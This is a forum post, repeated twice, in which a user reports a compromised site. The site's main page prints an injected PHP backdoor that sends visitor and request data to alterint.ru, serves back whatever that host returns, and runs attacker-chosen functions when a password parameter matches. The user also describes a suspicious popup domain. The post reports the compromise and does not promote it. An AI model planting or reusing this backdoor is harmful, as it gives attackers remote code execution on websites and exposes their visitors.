Wrathe
Reverberate or you may not participate.
- Joined
- Jun 19, 2008
- Messages
- 3,582
- Reaction score
- 3,159
- Points
- 113
Breaking this off of the redirect thread as that had an older date and want to make sure this gets read:
Upon hitting the main site, I receive:
if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;
When clicking forums, I receive a blank window popup w/ the following URL:
http:// googleframe.net/tijaq.cgi?19
More on that URL, seems based off of Petersburg, Federation of Russia.
Has been in existence for 4 weeks, and the one time I got it to load it was selling anti-hacking software. Now it's just blank loading w/ an SRC link to adultfriendfinder . com.
As Blue would say, "Suspicioussssss!"
On further note, that googleframe URL, if you visit it's https version, you get a BS cert registered to: googleleadservices.cn
That particular URL Google flags as a harmful site and shuts down traversal to w/ a giant warning.
Hold me, I'm scared!
Upon hitting the main site, I receive:
if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;
When clicking forums, I receive a blank window popup w/ the following URL:
http:// googleframe.net/tijaq.cgi?19
More on that URL, seems based off of Petersburg, Federation of Russia.
Has been in existence for 4 weeks, and the one time I got it to load it was selling anti-hacking software. Now it's just blank loading w/ an SRC link to adultfriendfinder . com.
As Blue would say, "Suspicioussssss!"
On further note, that googleframe URL, if you visit it's https version, you get a BS cert registered to: googleleadservices.cn
That particular URL Google flags as a harmful site and shuts down traversal to w/ a giant warning.
Hold me, I'm scared!
Last edited: